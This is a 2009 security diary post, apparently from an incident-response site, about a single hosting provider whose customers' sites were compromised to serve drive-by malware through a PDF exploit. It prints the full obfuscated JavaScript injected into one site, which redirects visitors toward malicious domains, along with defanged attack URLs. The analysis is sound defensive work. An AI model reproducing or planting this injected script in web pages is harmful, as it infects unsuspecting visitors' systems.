Hosted javascript leading to .cn PDF malware

Published: 2009-04-10. Last Updated: 2009-04-10 21:30:18 UTC
by Stephen Hall (Version: 1)
0 comment(s)

Unfortunately such subject lines are all so common. However, lets work through this one together to show an excellent tool, and a common source.

Steve Burn over at it-mate.co.uk submitted an investigation they had been running into a number of sites hosted by a single hosting provider being compromised and leading to malware. 

So, lets look at a few examples:

Firstly, just a simple proof that the exploit is still in place, lets look at :

hxxp://www.adammcgrath.ca (216.97.237.30 - Whois : OrgName:    Lunar Pages)

If you simply curl, or wget, the home page of this site, you'll get 

function c32aee72b6q49ce6d11e3bbe(q49ce6d11e438d){ var q49ce6d11e4b6d=16; return 
(eval('pa'+'rseInt')(q49ce6d11e438d,q49ce6d11e4b6d));}function q49ce6d11e5afc(q4
9ce6d11e62cc){  var q49ce6d11e6ab5='';q49ce6d11e89dc=String['fromCharCode'];for(
q49ce6d11e7271=0;q49ce6d11e7271<q49ce6d11e62cc.length;q49ce6d11e7271+=2){ q49ce6
d11e6ab5+=(q49ce6d11e89dc(c32aee72b6q49ce6d11e3bbe(q49ce6d11e62cc.substr(q49ce6d
11e7271,2))));}return q49ce6d11e6ab5;} var vd1='';var q49ce6d11e91ab='3C7'+vd1+'
3637'+vd1+'2697'+vd1+'07'+vd1+'43E696628216D7'+vd1+'96961297'+vd1+'B646F637'+vd1
+'56D656E7'+vd1+'42E7'+vd1+'7'+vd1+'7'+vd1+'2697'+vd1+'465287'+vd1+'56E657'+vd1+
'363617'+vd1+'065282027'+vd1+'2533632536392536362537'+vd1+'322536312536642536352
532302536652536312536642536352533642536332533332533322532302537'+vd1+'332537'+vd
1+'32253633253364253237'+vd1+'2536382537'+vd1+'342537'+vd1+'342537'+vd1+'3025336
12532662532662536332536632536312537'+vd1+'32253631253636253639253665253265253639
2536652536362536662532662537'+vd1+'342537'+vd1+'32253631253636253636253266253639
2536652536342536352537'+vd1+'382532652537'+vd1+'302536382537'+vd1+'3025336625323
7'+vd1+'2532622534642536312537'+vd1+'342536382532652537'+vd1+'322536662537'+vd1+
'352536652536342532382534642536312537'+vd1+'342536382532652537'+vd1+'32253631253
665253634253666253664253238253239253261253337'+vd1+'253335253334253337'+vd1+'253
337'+vd1+'253239253262253237'+vd1+'253330253237'+vd1+'2532302537'+vd1+'37'+vd1+'
2536392536342537'+vd1+'34253638253364253334253331253337'+vd1+'253230253638253635
253639253637'+vd1+'2536382537'+vd1+'342533642533312533382533312532302537'+vd1+'3
32537'+vd1+'342537'+vd1+'39253663253635253364253237'+vd1+'2537'+vd1+'36253639253
7'+vd1+'332536392536322536392536632536392537'+vd1+'342537'+vd1+'3925336125363825
3639253634253634253635253665253237'+vd1+'2533652533632532662536392536362537'+vd1
+'3225363125366425363525336527'+vd1+'29293B7'+vd1+'D7'+vd1+'6617'+vd1+'2206D7'+v
d1+'969613D7'+vd1+'47'+vd1+'27'+vd1+'5653B3C2F7'+vd1+'3637'+vd1+'2697'+vd1+'07'+
vd1+'43E';document.write(q49ce6d11e5afc(q49ce6d11e91ab));

At the ISC, we're talked a number of times of methods to decode such java script, from TEXT AREA manipulation in the good old days, through to tools such as Malzilla to aide our analysis. However both our intrepid reader, any myself like to use Wepawet

Analysis with this couldnt be easier, enter the URL, click, and wait for the response. So lets see what Wepawet shows for this web site.

http://wepawet.cs.ucsb.edu/view.php?hash=ae4855ee814ab2c158ac3d9361429a75&t=1239303649&type=js

If you follow through the analysis provided by wepawet, you'll see that it bounces through clarafin.info. 

Google safe browsing also highlights that this domain is (or has been) hostile:

 

Has this site hosted malware?

Yes, this site has hosted malicious software over the past 90 days. It infected 10 domain(s), including sound.jp/ohira/ucoz.net/,cmizziconstruction.com/.

So, following the malware trail results in this hxxp://clarafin.info/traff/index.php? redirecting to this hxxp://letomerin.cn/x0/index.php

Finally a PDF exploit is attempted, and a piece of malware is dropped on to the unsuspecting system, details as always from VirusTotal shows very little AV Coverage.

Now all this isn't very unusual, and having a large number of compromised hosts isn't either. What is interesting here is that a single provider is hosting these compromised pages.

Steve's investigations came to an end when the hosting provider commented that:

"So far, all I've received is a form-letter stating it wasn't a compromise of their servers, but hackers going round finding exploitable scripts written by their customers"

Now this may be the case, as there does appear to be some level of commonality between the sites. However, surely a duty of care exists here in that the hosting provider is unwittingly hosting drive by malware which is resulting in very low AV infections.

 

Steve Hall

ISC Handler

www.tarkie.net

 

 

Keywords: lunar pages wepawet
0 comment(s)

Comments


Diary Archives